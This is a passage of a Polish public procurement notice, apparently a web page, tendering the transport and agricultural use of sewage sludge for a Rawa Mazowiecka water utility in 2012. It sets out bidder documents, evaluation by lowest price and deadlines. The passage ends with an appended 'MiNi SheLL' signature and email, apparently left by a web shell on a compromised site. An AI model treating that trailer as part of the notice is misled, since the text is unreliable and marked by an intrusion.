1)odpowiedniego zezwolenia, licencji lub koncesji na prowadzenie działalności w zakresie transportu oraz gospodarowania odpadami (odzysk lub unieszkodliwianie)  będącymi przedmiotem przetargu zgodnie z Ustawą z dnia 27 kwietnia 2001 r. o odpadach - Dz. U. z 2010 r. Nr 185 poz. 1243 z późniejszymi zmianami,
2) akt własności lub umowa dzierżawy - tj. dokument określający tytuł prawny gruntów, na których mają być stosowane osady ściekowe - wydany przez właściwy organ,
W przypadku dzierżawy - zgodę właściciela gruntów na zastosowanie na nich osadów ściekowych.
3) niezbędnej dokumentacji geologicznej i geodezyjnej gruntów na których osady mają być stosowane,
4)  badania gruntów wykonane metodami referencyjnymi zgodnie z Rozporządzeniem Ministra Środowiska z dnia 13 lipca 2010 w sprawie komunalnych osadów ściekowych - Dz. U. Nr 137 poz. 924 na których osady mają być stosowane lub potwierdzenie pisemne przez laboratorium do którego zostały dostarczone próbki gruntów (numery działek, z których zostały pobrane próbki) do badania według powyższego rozporządzenia (wyniki badań muszą być dostarczone przed podpisaniem umowy).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty Wykonawcy. Warunkiem takiej zmiany jest zaistnienie okoliczności, których nie można było przewidzieć w chwili zawarcia umowy:
1) Wystąpienia siły wyższej - w zakresie zmiany terminu wykonania Umowy, odstąpienia od Umowy.
2) Zmiany stawki VAT wynikającej ze zmiany przepisów prawa -  w zakresie zmiany wysokości wynagrodzenia, Wykonawcy. 
2. Zamawiający może odstąpić od umowy w przypadku opóźnienia się przez Wykonawcę z rozpoczęciem zamówienia o okres 7 dni lub przerwania prac i nie podjęcia ich przez okres 7 dni.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rawik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rawskie Wodociągi i Kanalizacja Sp. z o.o., 96-200 Rawa Mazowiecka, ul. Juliusza  Słowackiego 70..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2012 godzina 10:00, miejsce: Rawskie Wodociągi i Kanalizacja Sp. z o.o., 96-200 Rawa Mazowiecka, ul. Juliusza  Słowackiego 70.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com